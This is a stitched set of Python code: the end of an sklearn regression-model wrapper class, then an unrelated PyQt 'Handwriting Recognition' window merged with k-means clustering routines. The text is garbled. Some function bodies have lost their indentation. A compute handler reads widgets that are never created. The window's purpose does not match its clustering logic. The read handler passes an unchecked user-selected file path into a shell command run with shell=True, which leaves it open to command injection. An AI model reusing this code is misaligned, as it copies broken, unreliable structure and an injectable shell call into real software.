        self.coefindex = 0 # the current line index of the modelcoef to add
        self.sanityThresshold = 1.0e9
    def fit(self):
        """
        Class-method wrapping the fit-method of the sklearn model.
        Fits self.model on the transformed features against self.target and
        stores the resulting coefficients via setCoefficients().
        """
        self.model.fit(self.feature_tf,self.target)
        print("FIT COEFF=",self.model.coef_," INTERCEPT=",self.model.intercept_)
        self.setCoefficients()
        print("did some fitting, Parent-style:",type(self.model).__name__)
    def fitSanityCheck(self):
        """
        Class method which should cover/deal with failures of sklearn.
        Due to the small data-sets, sklearn sometimes fails rather miserably
        (even in case of a linear regression). This function should add the
        "I" in AI, and try to catch and remediate the problem. This function needs to
        be implemented for each model separately.
        Calling this function should be performed by the user. Placing it in the
        fit function of the model creates a recursive loop, which may not end well.
        """
        pass #body with no content
    def predict(self, Feature: pd.DataFrame) -> list:
        """
        Class-method wrapping around the predict method of the sklearn-model
        """
        return self.model.predict(Feature)
    def predictError(self, Feature: pd.DataFrame)-> tuple:
        """
        Class-method wrapping around the predict method of the sklearn-model, and
        performing additional calculations needed to calculate confidence interval based
        errorbars.
        parameters:
            Feature: the features of the data to predict
        returns:
            a tuple of lists: Targets, CI (every row gives the CI for 1 target, first column low, second column high)
        """
        predict=self.model.predict(Feature) # although a panda goes in, an nd-array comes out
        # Placeholder CI: both bounds equal to the prediction itself.
        CI=np.array(list([i]*2 for i in predict)) # no errorbars yet...just placeholder
        return predict, CI
    #@ignore_warnings(category=ConvergenceWarning)
    def CV_score(self, Target: pd.DataFrame, CV: int):
        """
        Class-method wrapping the cross_val_score functionality of sklearn.
        Variables:
            - CV : number of folds for cross-validation
            - Target : a pandas dataframe with the Target data belonging to the
                       Features provided upon initialisation.
        """
        import warnings
        from sklearn.model_selection import cross_val_score
        #!!!! NOTE THAT cross_val_score PERFORMS A SET OF FITS,
        #!!!! NOT TAKING THE intercept_ AND coef_ VALUES OF OUR "fit"
        #!!!! AS SUCH THESE VALUES ARE OF LITTLE PRACTICAL USE AS THEY
        #!!!! ARE HEAVILY DEPENDENT ON THE SUBSET. GOOD FOR A BALL-PARK GUESS...MAYBE
        #catching away the warnings to keep output clean
        with warnings.catch_warnings(record=True) as caught_warnings:
            warnings.simplefilter("always",category=ConvergenceWarning)
            mse=cross_val_score(self.model , self.feature_tf , Target,
                                scoring='neg_mean_squared_error',
                                cv = CV,
                                error_score = np.nan)
        return mse
    def setAverageCoefficients(self,EnsembleData: TModelResults, setCI: bool):
        """
        Use the ensemble data to create an "average" model, and set the "coefficients"
        in the current model. This should be performed in each model separately
        parameters:
            - EnsembleData : a TModelResults object containing the arrays with quality data and coefficients/parameters of the model for all runs
            - setCI : if True, calculate the 95% confidence interval
        """
        raise NotImplementedError("Please Implement this method")
    def printAverageCoefficients(self, File: str=None):
        """
        Print a block of information to a file, containing the averaged coefficients.
        parameters:
            - self:
            - File: string containing a filename, if None standard output is used. Default=None
        """
        raise NotImplementedError("Please Implement this method")
    def setCoefficients(self):
        """
        Class-method collecting and storing the fitting coefficients in the object
        """
        self.modelcoef.clear() #this is the first place it should appear...clear it if approached a second time
        self.coefindex=0 #correct start of indexing
        self.modelcoef['header']=[self.coefindex,"--------- Model-coefficients :",self.name," ------"]
        self.coefindex+=1
        #actual implementation should be done in each of the child-classes
    def setSanityThresshold(self, thress: float):
        # Setter for the threshold used by fitSanityCheck implementations.
        self.sanityThresshold=thress
    def getQualityMeasures(self) -> TDataPoint:
        """
        Class-method returning the quality measures of the current model.
        No printing should happen here!
        return:
            - datapoint: a TDataPoint object containing all relevant information.
        """
        from sklearn.metrics import mean_squared_error,mean_absolute_error
        from sklearn.model_selection import LeaveOneOut
        import numpy as np
        #the training data
        mean= np.mean(self.target)
        std = np.std(self.target)
        feature_pred = self.predict(self.feature_tf)
        RMSEtrain = np.sqrt(mean_squared_error(self.target, feature_pred))
        MAEtrain = mean_absolute_error(self.target, feature_pred)
        #Leave-One-Out Cross-validation
        LoO_CV=LeaveOneOut()
        scores = np.sqrt(-self.CV_score(self.target,CV=LoO_CV)) #minus because of the NEGATIVE_MSE --> old: CV=self.feature_tf.shape[0]
        trainLoO_mean=scores.mean()
        trainLoO_2sig=scores.std()*2.0
        #5-fold Cross-validation
        scores = np.sqrt(-self.CV_score(self.target,CV=5)) #minus because of the NEGATIVE_MSE
        trainCV5_mean=scores.mean()
        trainCV5_2sig=scores.std()*2.0
        #The test data
        feature_test_tf = self.pipeline.transform(self.feature_test) #No fitting on the test-data
        feature_pred_test=self.predict(feature_test_tf)
        RMSEtest=np.sqrt(mean_squared_error(self.target_test, feature_pred_test))
        MAEtest = mean_absolute_error(self.target_test, feature_pred_test)
        #now add the results to our model-results
        datapoint=TDataPoint()
        datapoint.setName(self.name)
        datapoint.setNameModel(self.nameModel)
        datapoint.setQuality(mean, std, RMSEtrain, MAEtrain, RMSEtest, MAEtest,
                             trainLoO_mean, trainLoO_2sig,
                             trainCV5_mean, trainCV5_2sig)
        datapoint.setModelCoef(self.modelcoef)
        return datapoint
|
import pandas as panda
import matplotlib.pyplot as plt
import numpy as np
import random
import sys
import matplotlib.cm as cm
import time
import matplotlib
from collections import OrderedDict
import math
from csv import writer
from csv import reader
import textwrap
from PIL import ImageTk, Image
import os
current_path = os.path.dirname(os.path.abspath(__file__))
from PyQt5.QtWidgets import *
from PyQt5 import QtCore, QtGui, QtWidgets
from textwrap3 import wrap
from PyQt5.QtGui import *
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import Qt
from subprocess import call
from subprocess import Popen, PIPE
import subprocess
import ctypes
from gtts import gTTS
from playsound import playsound
"""
Known issues:
1. K higher than 4 takes time to initialize : This is due to the implmented customized centroids initialization | Remarks: Perhaps use Kmeans++ or naive sharding to initialize centroids
2. Max K currently is 10 due to the initialized cmap and markers for plotting purposes
3. Centroid star colour hasn't been fixed
4. Centroids update not correct
"""
class MainWindow(QtWidgets.QWidget):
    def __init__(self):
        # Build the Qt widget tree immediately on construction.
        super(MainWindow, self).__init__()
        self.initUI()
    def initUI(self):
        """Create and lay out all widgets, wire up button handlers, and show
        the main window centred on screen."""
        self.resize(700, 550)
        self.setWindowTitle('Handwriting Recognition System')
        self.center()
        #self.ddl.activated[str].connect(self.onChanged_ddl(self, ))
        # Create textbox (preview)
        #self.textbox_trainDataset = QLineEdit(self)
        #self.textbox_trainDataset.move(10, 50)
        #self.textbox_trainDataset.resize(330,300)
        #self.textbox_trainDataset.setFont(QFont('century', 10))
        # Create label (preview)
        self.label_previewImage = QLabel('', self)
        self.label_previewImage.move(10, 50)
        self.label_previewImage.resize(340, 300)
        #self.label_previewImage.setFont(QFont('century', 12))
        # Create textbox (output)
        self.textbox_output = QTextEdit(self)
        self.textbox_output.move(350, 50)
        self.textbox_output.resize(340,300)
        self.textbox_output.setFont(QFont('century', 15))
        self.textbox_output.setLineWrapMode(1)
        # Create label (preview)
        self.label_preview = QLabel('Preview', self)
        self.label_preview.move(140, 20)
        self.label_preview.setFont(QFont('century', 12))
        # Create label (output)
        self.label_output = QLabel('Output', self)
        self.label_output.move(490, 20)
        self.label_output.setFont(QFont('century', 12))
        # Create label (Author: <NAME>)
        self.label_author = QLabel('Author: <NAME>', self)
        self.label_author.move(520, 530)
        self.label_author.setFont(QFont('century', 12))
        # Create a button in the window (Upload)
        self.button_compute = QPushButton('Upload', self)
        self.button_compute.move(80,370)
        self.button_compute.resize(80,30)
        self.button_compute.setFont(QFont('century', 12))
        # Create a button in the window (Read)
        self.button_read = QPushButton('Read', self)
        self.button_read.move(170,370)
        self.button_read.resize(80,30)
        self.button_read.setFont(QFont('century', 12))
        # connect button to function on_click
        self.button_compute.clicked.connect(self.on_click_browse_previewImage)
        self.button_read.clicked.connect(self.on_click_read)
        self.show()
    def on_click_browse_previewImage(self):
        """Open a file dialog for a jpg/png image and show it in the preview label."""
        fileName, _ = QtWidgets.QFileDialog.getOpenFileName(self, 'Single File', ".\\",
                                                            '*.jpg *.png') # QtCore.QDir.rootPath()
        # The selected path is stored in a module-level global so that
        # on_click_read can find it; an instance attribute would be safer.
        global temp
        temp = fileName
        pixmap = QPixmap(fileName)
        scaled_pixmap = pixmap.scaled(300, 300, Qt.KeepAspectRatio, Qt.FastTransformation)
        self.label_previewImage.setPixmap(scaled_pixmap)
    def onChanged_ddl(self, text):
        # NOTE(review): self.ddl is not created in the visible initUI and the
        # connect call for it is commented out — confirm this slot is still used.
        #self.ddl.setText(text)
        self.ddl.setCurrentText(text)
        self.ddl.setFont(QFont('century', 12))
def on_click_read(self):
try:
command = "handwriting.bat "+temp
P = subprocess.Popen(command, shell=True)
while not os.path.exists("predictedTexts.txt"):
time.sleep(1)
if os.path.exists("predictedTexts.txt"):
print("File found!")
with open('predictedTexts.txt') as f:
#DeprecationWarning
lines = np.array(f.readlines(),dtype=object)
newLines = lines[2]
newLines = newLines[8:-1]
self.textbox_output.setText(textwrap.fill(newLines, width=50))
gTTS(text=newLines, lang='en', slow=False).save("audio.mp4")
playsound(r'audio.mp4')
os.remove("predictedTexts.txt")
except:
QMessageBox.about(self, "Read error", "Please upload an image first.")
    def center(self):
        # Move the window so its frame is centred on the available screen area.
        frameGm = self.frameGeometry()
        centerPoint = QtWidgets.QDesktopWidget().availableGeometry().center()
        frameGm.moveCenter(centerPoint)
        self.move(frameGm.topLeft())
def on_click_compute(self):
#Get value from textbox3
textboxValue_numData = self.textbox_numData.text()
textboxValue_cluster = self.textbox_cluster.text()
textboxValue_trainDataset = self.textbox_trainDataset.text()
textboxValue_testDataset = self.textbox_testDataset.text()
#Get value from dropdownlist Norm
ddlValue_Norm = self.ddl.currentText()
getCluster(self, textboxValue_cluster, textboxValue_trainDataset, textboxValue_testDataset, ddlValue_Norm, textboxValue_numData)
#self.textbox_cluster.setText("")
def getCluster(self, textboxValue_cluster, textboxValue_trainDataset, textboxValue_testDataset, ddlValue_Norm, textboxValue_numData):
    """Train k-means on the training CSV, plot the clusters, then run the
    trained centroids over the test CSV and write a summary report.

    Args:
        self: the main-window instance (passed explicitly; module-level function).
        textboxValue_cluster: requested cluster count k as text; clamped to 1..10.
        textboxValue_trainDataset: path of the training CSV (4 numeric columns w,x,y,z).
        textboxValue_testDataset: path of the test CSV (same layout).
        ddlValue_Norm: distance selection, "L1 Norm" or "L2 Norm".
        textboxValue_numData: number of training rows to use, as text; capped at 100.

    NOTE(review): this body was reconstructed from an indentation-less dump;
    the nesting of the two while-loops is a best-effort reading -- confirm
    against the original file.
    """
    # Start timer (Train)
    train_start = time.time()
    try:
        k = int(textboxValue_cluster)
        maxDataSize = int(textboxValue_numData)
    except:
        # NOTE(review): bare except + sys.exit() also swallows unrelated
        # failures; catching ValueError only would be safer.
        messageBox("Error!", "Please enter only integer for cluster and number of data!", 1)
        sys.exit()
    # Validation check K more than 10
    if k > 10:
        k = 10
        messageBox("Warning!", "Only value between 1-10 is allowed for Cluster(K). Cluster(K) has been set to 10!", 1)
    if k < 0:
        k = 1
        messageBox("Warning!", "Only value between 1-10 is allowed for Cluster(K). Cluster(K) has been set to 1!", 1)
    if k >= 4 and k <= 10:
        messageBox("Warning!", "K with 4 or more might take some time for centroids to initialize!", 1)
    # Validation check maxDataSize more than 100
    if maxDataSize > 100:
        maxDataSize = 100
        messageBox("Warning!", "Maximum number of data is 100. Number of data has been set to 100!", 1)
    x_canvasSize, y_canvasSize = 200, 200
    #QMessageBox.question(self, 'Message!', "You typed: " + str(k), QMessageBox.Ok, QMessageBox.Ok)
    # Read csv file (first 4 columns are the w/x/y/z coordinates)
    data = panda.read_csv(textboxValue_trainDataset, header=None, usecols=[0,1,2,3])
    data_temp = panda.read_csv(textboxValue_trainDataset, header=None)
    w = np.array(data[0:maxDataSize][0]) #arrayWXYZ[0]
    x = np.array(data[0:maxDataSize][1]) #arrayWXYZ[1]
    y = np.array(data[0:maxDataSize][2]) #arrayWXYZ[2]
    z = np.array(data[0:maxDataSize][3]) #arrayWXYZ[3]
    # NOTE(review): built from the full file, not the maxDataSize slice used
    # above -- confirm this is intended.
    arrayWXYZ = np.array(data)
    #Initialize variables
    centroidsW = []
    centroidsX = []
    centroidsY = []
    centroidsZ = []
    centW_new = []
    centX_new = []
    centY_new = []
    centZ_new = []
    centroids_new = []
    iterations = 0
    centroids_error = 1 #to proceed into loop
    numP = 0
    reinitializeCentroids = 1
    print("Initializing centroids...Please wait...")
    # Outer loop: iterate k-means updates until the centroids stop moving.
    while(centroids_error != 0):
        # Inner loop: (re)draw random centroids whenever the previous draw
        # produced under-populated or all-zero clusters.
        while(reinitializeCentroids > 0):
            #conditions to enter this "if" block
            # - when first entering loop
            # - Initialize centroids if haven't
            # - Re-intialize centroids if centroids contain Nan or 0 (ie. if initialization fails)
            if reinitializeCentroids > 0:
                reinitializeCentroids = 0
                centroidsW = []
                centroidsX = []
                centroidsY = []
                centroidsZ = []
                centroids_new = []
                iterations = 0
                cWXYZ, centroidsW, centroidsX, centroidsY, centroidsZ = initializeCentroids(centroidsW, centroidsX, centroidsY, centroidsZ, w, x, y, z, k)
        # Assignment step: accumulate coordinate sums and point counts per cluster.
        pointToCluster = []
        averageW = np.zeros(k)
        averageX = np.zeros(k)
        averageY = np.zeros(k)
        averageZ = np.zeros(k)
        numPoints = np.zeros(k)
        for i in range(len(w)): #Accumulate averages of coordinates and number of total points
            if ddlValue_Norm == "L1 Norm":
                # distance from point i to each of the k centroids (L1)
                dist = L1_norm(arrayWXYZ[i], cWXYZ, 1)
            elif ddlValue_Norm == "L2 Norm":
                # distance from point i to each of the k centroids (L2)
                dist = L2_norm(arrayWXYZ[i], cWXYZ, 1)
            # nearest-centroid index plus the point itself
            pointToCluster.append((np.argmin(dist), arrayWXYZ[i]))
            averageW[np.argmin(dist)] += arrayWXYZ[i][0]
            averageX[np.argmin(dist)] += arrayWXYZ[i][1]
            averageY[np.argmin(dist)] += arrayWXYZ[i][2]
            averageZ[np.argmin(dist)] += arrayWXYZ[i][3]
            numPoints[np.argmin(dist)] += int(1)
        #Validation check - Checks if centroids initialization is poor and needs reinitialization
        numPts_Threshold = math.floor((100/k)/2) # parameter to ensure the minimum # of points per cluster
        numPoints = numPoints.astype(int)
        # NOTE(review): loop variable y shadows the data column y read above.
        for y in range(k):
            if numPoints[y] <= numPts_Threshold or np.sum(cWXYZ[y]) == 0:
                #if np.sum(cWXYZ[y]) == 0 or isNan_cWXYZ:
                reinitializeCentroids += 1
        pointToCluster = np.array(pointToCluster)
        print("-"*20 + " TRAIN " + "-"*20)
        print("ITERATION {0}".format(iterations+1))
        print("averageW: {0}".format(averageW))
        print("averageX: {0}".format(averageX))
        print("averageY: {0}".format(averageY))
        print("averageZ: {0}".format(averageZ))
        print("numPoints: {0}".format(numPoints))
        print("")
        numP = numPoints
        # Update step: coordinate sums / counts -> new centroid positions.
        centW_new, centX_new, centY_new, centZ_new = updateCentroids(averageW, averageX, averageY, averageZ, numPoints)
        centroids_new = np.array(list(zip(centW_new, centX_new, centY_new, centZ_new)))
        print("previous Centroids: ")
        print(cWXYZ)
        print("Updated Centroids: ")
        print(centroids_new)
        print("-"*50)
        #Validation check - Centroids error (0 means converged, loop ends)
        if ddlValue_Norm == "L1 Norm":
            centroids_error = L1_norm(cWXYZ, centroids_new, None)
        elif ddlValue_Norm == "L2 Norm":
            centroids_error = L2_norm(cWXYZ, centroids_new, None)
        print("Centroids error: ")
        print(centroids_error)
        cWXYZ = centroids_new
        iterations += 1
        print()
    #Sort points according to their clusters
    ptsClusters = []
    pts = 0
    for m in range(k):
        temp_pts = []
        for y in range(len(pointToCluster)):
            if pointToCluster[y][0] == m:
                temp_pts.append(pointToCluster[y][1])
        ptsClusters.append(temp_pts)
    #Plot data points and clusters
    fig = plt.figure(figsize=(x_canvasSize,y_canvasSize))
    ax = fig.add_subplot(111, projection='3d')
    cmap_array = ['Blues_r', 'Greens_r', 'Reds_r', 'Purples_r', 'Greys_r', 'pink_r', 'Oranges_r', 'jet_r', 'copper_r', 'plasma_R'] # initialize cmap for plotting
    markers = ["P", "v" , "," , "o" , "^" , "<", ">", ".", "1", "p"] # initialize markers for plotting
    #Slice points in specific coordinates (4 columns); w/x/y are plotted as
    #3-D position and z drives the colour map.
    for r in range(k):
        print("CLUSTER {0}: {1}".format(r+1, ptsClusters[r]))
        print("Total # of points in cluster {0}: {1}".format(r+1, len(ptsClusters[r])))
        w_sliced = []
        x_sliced = []
        y_sliced = []
        z_sliced = []
        for g in range(len(ptsClusters[r])):
            w_sliced.append(ptsClusters[r][g][0])
            x_sliced.append(ptsClusters[r][g][1])
            y_sliced.append(ptsClusters[r][g][2])
            z_sliced.append(ptsClusters[r][g][3])
        #plot data points
        img = ax.scatter(w_sliced, x_sliced, y_sliced, c=z_sliced, cmap=cmap_array[r], s=30, marker=markers[r])
        #plot k clusters (clusters are ones with bigger sized point)
        ax.scatter(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], c=centroids_new[r][3], cmap=cmap_array[r], marker=markers[r], s=200)
        ax.set_title("TRAIN (" + ddlValue_Norm + ")", fontsize=40)
        # NOTE(review): one colour bar is added per cluster iteration.
        colourBar = fig.colorbar(img)
        colourBar.set_label('Cluster ' + str(r+1) + "(TRAIN)")
        print("Centroid: ")
        print(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], centroids_new[r][3])
        print("")
    #fig.savefig("kmeans.png")
    plt.show()
    #Output csv file with appended column (classification) - Train
    train_fileName = updateCSV(textboxValue_trainDataset, pointToCluster[:,0], data_temp[0:maxDataSize])
    #Stop timer (Train)
    train_end = time.time()
    #Start timer (Test)
    test_start = time.time()
    #run on Test dataset
    test_centroids_error, test_centroids_coordinate, test_pointToCluster, test_fileName, centroids_error_overall = predict(textboxValue_testDataset, centroids_new, ddlValue_Norm, k, x_canvasSize, y_canvasSize, cmap_array, markers)
    #Stop timer (Test)
    test_end = time.time()
    #Write summary to text file and terminal
    writeSummary(train_start, train_end, iterations, centroids_new, pointToCluster, numP, ddlValue_Norm, test_centroids_error, test_centroids_coordinate, test_pointToCluster, train_fileName, test_fileName, test_start, test_end, centroids_error_overall, textboxValue_testDataset)
def predict(textboxValue_testDataset, centroids_new, ddlValue_Norm, k, x_canvasSize, y_canvasSize, cmap_array, markers):
    """Assign every test-CSV row to the nearest trained centroid, compare the
    resulting cluster means against the trained centroids, plot, and save an
    annotated CSV.

    Args:
        textboxValue_testDataset: path of the test CSV (4 numeric columns).
        centroids_new: (k, 4) array of trained centroids.
        ddlValue_Norm: "L1 Norm" or "L2 Norm".
        k: number of clusters.
        x_canvasSize, y_canvasSize: matplotlib figure size.
        cmap_array, markers: per-cluster plotting styles (reused from training).

    Returns:
        (per-cluster error array, test cluster means, point/cluster pairs,
         output CSV path, overall centroid error)

    NOTE(review): body reconstructed from an indentation-less dump -- confirm
    loop nesting against the original file.
    """
    #Read csv file
    testData = panda.read_csv(textboxValue_testDataset, header=None, usecols=[0,1,2,3])
    testData_temp = panda.read_csv(textboxValue_testDataset, header=None) #temp variable for updating csv
    w = np.array(testData[:][0])
    x = np.array(testData[:][1])
    y = np.array(testData[:][2])
    z = np.array(testData[:][3])
    test_arrayWXYZ = np.array(testData)
    #Initialize variables
    centroidsW = []
    centroidsX = []
    centroidsY = []
    centroidsZ = []
    centW_new = []
    centX_new = []
    centY_new = []
    centZ_new = []
    centroids_error_array = []
    test_pointToCluster = []
    averageW = np.zeros(k)
    averageX = np.zeros(k)
    averageY = np.zeros(k)
    averageZ = np.zeros(k)
    numPoints = np.zeros(k)
    # Single assignment pass: no centroid updates here, the trained centroids
    # are used as-is.
    for i in range(len(w)): #Accumulate averages of coordinates and number of total points
        if ddlValue_Norm == "L1 Norm":
            # distance from point i to each trained centroid (L1)
            dist = L1_norm(test_arrayWXYZ[i], centroids_new, 1)
        elif ddlValue_Norm == "L2 Norm":
            # distance from point i to each trained centroid (L2)
            dist = L2_norm(test_arrayWXYZ[i], centroids_new, 1)
        # nearest-centroid index plus the point itself
        test_pointToCluster.append((np.argmin(dist), test_arrayWXYZ[i]))
        averageW[np.argmin(dist)] += test_arrayWXYZ[i][0]
        averageX[np.argmin(dist)] += test_arrayWXYZ[i][1]
        averageY[np.argmin(dist)] += test_arrayWXYZ[i][2]
        averageZ[np.argmin(dist)] += test_arrayWXYZ[i][3]
        numPoints[np.argmin(dist)] += int(1)
    test_pointToCluster = np.array(test_pointToCluster)
    print("-"*20 + " PREDICT " + "-"*20)
    print("averageW: {0}".format(averageW))
    print("averageX: {0}".format(averageX))
    print("averageY: {0}".format(averageY))
    print("averageZ: {0}".format(averageZ))
    print("numPoints: {0}".format(numPoints))
    print("")
    # Means of the test points per cluster, for comparison with the trained centroids.
    centW_new, centX_new, centY_new, centZ_new = updateCentroids(averageW, averageX, averageY, averageZ, numPoints)
    test_centroids = np.array(list(zip(centW_new, centX_new, centY_new, centZ_new)))
    print("Predicted Centroids: ")
    print(centroids_new)
    print("Test Centroids: ")
    print(test_centroids)
    print("-"*50)
    # Per-cluster distance between trained centroid and test-cluster mean.
    for i in range(k):
        #Validation check - Centroids error
        if ddlValue_Norm == "L1 Norm":
            print("centroids_new[{0}]: {1}".format(i+1, centroids_new[i]))
            print("test_centroids[{0}]: {1}".format(i+1, test_centroids[i]))
            centroids_error = L1_norm(centroids_new[i], test_centroids[i], None)
        elif ddlValue_Norm == "L2 Norm":
            print("centroids_new[{0}]: {1}".format(i+1, centroids_new[i]))
            print("test_centroids[{0}]: {1}".format(i+1, test_centroids[i]))
            centroids_error = L2_norm(centroids_new[i], test_centroids[i], None)
        print("Centroids error: ")
        print(centroids_error)
        centroids_error_array.append(centroids_error)
    # NOTE(review): overall error always uses the L2 norm regardless of the
    # selected norm -- confirm this is intended.
    centroids_error_overall = L2_norm(centroids_new, test_centroids, None)
    #Save CSV file
    test_fileName = updateCSV(textboxValue_testDataset, test_pointToCluster[:,0], testData_temp)
    #----------------------------------------PLOT FIGURE----------------------------------------
    #Sort points according to their clusters
    test_ptsClusters = []
    pts = 0
    for m in range(k):
        temp_pts = []
        for y in range(len(test_pointToCluster)):
            if test_pointToCluster[y][0] == m:
                temp_pts.append(test_pointToCluster[y][1])
        test_ptsClusters.append(temp_pts)
    #Plot data points and clusters
    fig = plt.figure(figsize=(x_canvasSize,y_canvasSize))
    ax = fig.add_subplot(111, projection='3d')
    cmap_array = cmap_array # initialize cmap for plotting
    markers = markers # initialize markers for plotting
    #Slice points in specific coordinates (4 columns)
    print("="*20 + " TEST " + "="*20)
    for r in range(k):
        print("CLUSTER {0}: {1}".format(r+1, test_ptsClusters[r]))
        print("Total # of points in cluster {0}: {1}".format(r+1, len(test_ptsClusters[r])))
        w_sliced = []
        x_sliced = []
        y_sliced = []
        z_sliced = []
        for g in range(len(test_ptsClusters[r])):
            w_sliced.append(test_ptsClusters[r][g][0])
            x_sliced.append(test_ptsClusters[r][g][1])
            y_sliced.append(test_ptsClusters[r][g][2])
            z_sliced.append(test_ptsClusters[r][g][3])
        #plot data points
        img = ax.scatter(w_sliced, x_sliced, y_sliced, c=z_sliced, cmap=cmap_array[r], s=30, marker=markers[r])
        #plot k clusters (clusters are ones with bigger sized point)
        ax.scatter(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], c=centroids_new[r][3], cmap=cmap_array[r], marker=markers[r], s=200)
        ax.set_title("TEST (" + ddlValue_Norm + ")", fontsize=40)
        colourBar = fig.colorbar(img)
        colourBar.set_label('Cluster ' + str(r+1) + " (TEST)")
        print("Centroid: ")
        print(centroids_new[r][0], centroids_new[r][1], centroids_new[r][2], centroids_new[r][3])
        print("")
    plt.show()
    return np.array(centroids_error_array), test_centroids, test_pointToCluster, test_fileName, centroids_error_overall
def updateCSV(csv, content, csv_pd):
    """Append *content* as a new right-most column to *csv_pd* and save it
    next to the source CSV as ``output_<name>.<ext>``.

    Args:
        csv: path of the source CSV (used only to derive the output path).
        content: iterable of per-row values (here: cluster indices).
        csv_pd: pandas DataFrame holding the rows to save (mutated in place).

    Returns:
        The full path of the file that was written.
    """
    fileName = os.path.basename(csv)
    savePath = os.path.dirname(csv)
    # os.path.splitext handles names with extra dots (unlike split(".")), and
    # os.path.join keeps the output path portable (the old "\\" literal only
    # worked on Windows).
    file, ext = os.path.splitext(fileName)
    fileName_new = os.path.join(savePath, "output_" + file + ext)
    # New column label = current column count, i.e. appended on the right.
    csv_pd[len(csv_pd.columns)] = content
    csv_pd.to_csv(fileName_new, index = False, header=False)
    print("=================SAVED FILE=================")
    print("Filename: {0}".format(fileName_new))
    print("============================================")
    return fileName_new
def messageBox(title, text, style):
    """Show a native Win32 message box (Windows-only: relies on ctypes.windll).

    Args:
        title: window title.
        text: message body.
        style: Win32 MessageBox style flags.

    Returns:
        The integer button code returned by MessageBoxW.
    """
    return ctypes.windll.user32.MessageBoxW(0, text, title, style)
def get_sublists(original_list, number_of_sub_list_wanted):
    """Deal *original_list* round-robin into the requested number of sublists.

    Element i goes to sublist ``i % number_of_sub_list_wanted``; the relative
    order within each sublist is preserved.
    """
    n = number_of_sub_list_wanted
    return [original_list[offset::n] for offset in range(n)]
def initializeCentroids(centroidsW, centroidsX, centroidsY, centroidsZ, w, x, y, z, k):
    """Draw k random starting centroids, one coordinate array per dimension.

    Each coordinate is drawn uniformly from [0, max(dim)) of the matching data
    dimension.  The incoming centroid-list arguments are ignored and replaced;
    they are kept in the signature for caller compatibility.

    Returns:
        (cWXYZ, centroidsW, centroidsX, centroidsY, centroidsZ) where cWXYZ is
        a (k, 4) array of the same centroids stacked column-wise.

    NOTE(review): np.random.randint's upper bound is exclusive, so the data
    maximum itself can never be drawn -- confirm this is intended.
    """
    centroidsW = np.array(np.random.randint(0, np.amax(w), size=k)) #gets k random numbers(between 0 and max/highest number in coordinate w) to initialize centroids for coordinate w
    centroidsX = np.array(np.random.randint(0, np.amax(x), size=k)) #same for coordinate x
    centroidsY = np.array(np.random.randint(0, np.amax(y), size=k)) #same for coordinate y
    centroidsZ = np.array(np.random.randint(0, np.amax(z), size=k)) #same for coordinate z
    cWXYZ = np.array(list(zip(centroidsW, centroidsX, centroidsY, centroidsZ))) #Merge centroids coordinate w,x,y,z into list
    """
    print("")
    print("Initialize Centroids: ")
    print(cWXYZ)
    """
    return cWXYZ, centroidsW, centroidsX, centroidsY, centroidsZ
def writeSummary(start, end, iterations, centroids_new, pointToCluster, numP, ddlValue_Norm, test_centroids_error, test_centroids_coordinate, test_pointToCluster, train_fileName, test_fileName, test_start, test_end, centroids_error_overall, textboxValue_testDataset):
    """Write the TRAIN/TEST run report to kmeans.txt (next to the test CSV)
    and echo a shorter version to the terminal.

    NOTE(review): centroids_error_overall is accepted but never used; the
    accuracy figure is derived from the per-cluster errors instead.
    """
    #Write to kmeans.txt file
    savePath = os.path.dirname(textboxValue_testDataset)
    # NOTE(review): "\\" makes this path Windows-only.
    f = open(savePath + "\\kmeans.txt","w+")
    # ---- TRAIN section ----
    f.write("=================TRAIN=================\n")
    f.write("Time taken (s): ")
    f.write(str(end - start))
    f.write("\n")
    f.write("Iterations: " + str(iterations))
    f.write("\n")
    f.write("Norm: {0}".format(ddlValue_Norm))
    f.write("\n")
    f.write("Output file: ")
    f.write(train_fileName)
    f.write("\n")
    #output summary to command line
    print("=================TRAIN=================")
    print("Time taken (s): {0}".format((end - start)))
    print("Iterations: " + str(iterations))
    print("Norm: {0}".format(ddlValue_Norm))
    print("Output file: {0}".format(train_fileName))
    print("Latest Centroids: ")
    #Centroids Predicted
    f.write("Centroids (Predicted): \n")
    for i in range(len(centroids_new)):
        print("Centroid (Predicted) " + str(i+1) + " = " + str(centroids_new[i][0]) + ", " + str(centroids_new[i][1]) + ", " + str(centroids_new[i][2]) + ", " + str(centroids_new[i][3]))
        f.write("Centroid " + str(i+1) + " = ")
        f.write(str(centroids_new[i][0]))
        f.write(", ")
        f.write(str(centroids_new[i][1]))
        f.write(", ")
        f.write(str(centroids_new[i][2]))
        f.write(", ")
        f.write(str(centroids_new[i][3]))
        f.write("\n")
    #Number of points per cluster plus the grand total
    print("Number of points: ")
    print(str(numP) + " #" + str(np.sum(numP)))
    f.write("Number of points: ")
    f.write(str(numP) + " #" + str(np.sum(numP)))
    f.write("\n")
    print("Centroids (Cluster - Points): --Please refer to the save file named kmeans.txt--")
    print("=====================================")
    # One "<cluster> - w, x, y, z" line per training point (file only).
    f.write("Centroid (Cluster - Points): \n")
    for i in range(len(pointToCluster)):
        f.write(str(pointToCluster[i][0]))
        f.write(" - ")
        f.write(str(pointToCluster[i][1][0]))
        f.write(", ")
        f.write(str(pointToCluster[i][1][1]))
        f.write(", ")
        f.write(str(pointToCluster[i][1][2]))
        f.write(", ")
        f.write(str(pointToCluster[i][1][3]))
        f.write("\n")
    f.write("======================================")
    # ---- TEST section ----
    f.write("\n=================TEST=================\n")
    f.write("Time taken (s): ")
    f.write(str(test_end - test_start))
    f.write("\n")
    f.write("Norm: {0}".format(ddlValue_Norm))
    f.write("\n")
    f.write("Number of points: ")
    f.write(str(len(test_pointToCluster)))
    f.write("\n")
    f.write("Output file: ")
    f.write(test_fileName)
    f.write("\n")
    #output summary to command line
    print("=================TEST=================")
    print("Time taken (s): {0}".format((test_end - test_start)))
    print("Norm: {0}".format(ddlValue_Norm))
    print("Number of points: {0}".format(len(test_pointToCluster)))
    print("Output file: {0}".format(test_fileName))
    #Centroids Predicted (repeated here for side-by-side comparison with Test)
    f.write("Centroids (Predicted): \n")
    for i in range(len(centroids_new)):
        print("Centroid (Predicted)" + str(i+1) + " = " + str(centroids_new[i][0]) + ", " + str(centroids_new[i][1]) + ", " + str(centroids_new[i][2]) + ", " + str(centroids_new[i][3]))
        f.write("Centroid " + str(i+1) + " = ")
        f.write(str(centroids_new[i][0]))
        f.write(", ")
        f.write(str(centroids_new[i][1]))
